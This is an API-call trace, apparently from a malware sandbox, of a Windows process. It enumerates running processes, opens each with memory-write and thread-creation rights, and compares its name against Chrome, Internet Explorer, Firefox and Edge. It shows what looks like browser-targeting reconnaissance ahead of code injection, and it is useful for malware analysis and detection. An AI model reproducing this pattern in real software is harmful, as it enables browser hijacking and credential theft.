	[0229.900] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0229.901] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0229.902] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0229.902] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x6650
	[0229.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.902] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0229.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.903] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.903] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0229.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.903] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.904] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0229.904] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x6654
	[0229.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.904] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0229.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.905] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.905] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0229.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.905] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.905] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0229.906] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x6658
	[0229.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.906] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0229.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.907] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.907] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0229.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.907] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.908] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0229.908] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x665c
	[0229.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.908] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0229.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.909] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.909] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0229.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.909] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.909] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0229.910] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x6660
	[0229.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.910] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0229.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.911] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.911] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0229.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.911] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.911] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0229.912] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x6664
	[0229.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.912] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0229.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.913] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.913] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0229.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.914] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.914] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0229.915] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x6668
	[0229.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.915] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0229.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.915] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.916] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0229.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.916] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.916] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0229.917] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x666c
	[0229.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.917] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0229.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.917] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.917] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0229.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.918] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.918] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.919] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x6670
	[0229.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.919] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.919] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.919] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.920] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.920] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.921] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x6674
	[0229.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.921] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.921] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.922] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.922] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.922] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.923] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x6678
	[0229.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.923] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.923] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.924] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.924] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.924] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.925] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x667c
	[0229.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.925] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.925] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.926] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.926] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.926] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.927] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x6680
	[0229.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.927] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.927] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.928] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.928] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.928] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.929] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x6684
	[0229.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.929] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.930] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.930] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.930] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.931] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.931] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x6688
	[0229.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.932] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.932] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.932] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.932] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.933] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0229.933] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x668c
	[0229.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.934] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0229.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.934] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.934] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0229.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.935] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.935] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.936] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x6690
	[0229.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.936] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.936] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.936] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.937] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.937] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0229.938] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x6694
	[0229.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.938] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.938] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.938] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.939] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.939] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0229.940] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x6698
	[0229.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.940] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0229.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.940] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.940] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0229.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.941] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.941] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.942] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x669c
	[0229.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.942] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.942] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.942] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.943] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.943] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0229.944] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x66a0
	[0229.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.944] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0229.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.944] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.007] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0230.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.007] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.008] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0230.008] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x66a4
	[0230.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.009] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0230.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.009] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.009] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0230.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.010] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.010] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0230.011] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x66a8
	[0230.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.011] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0230.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.011] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.011] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0230.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.011] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.012] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0230.012] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x66ac
	[0230.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.012] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0230.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.013] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.013] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0230.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.013] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.014] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0230.014] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
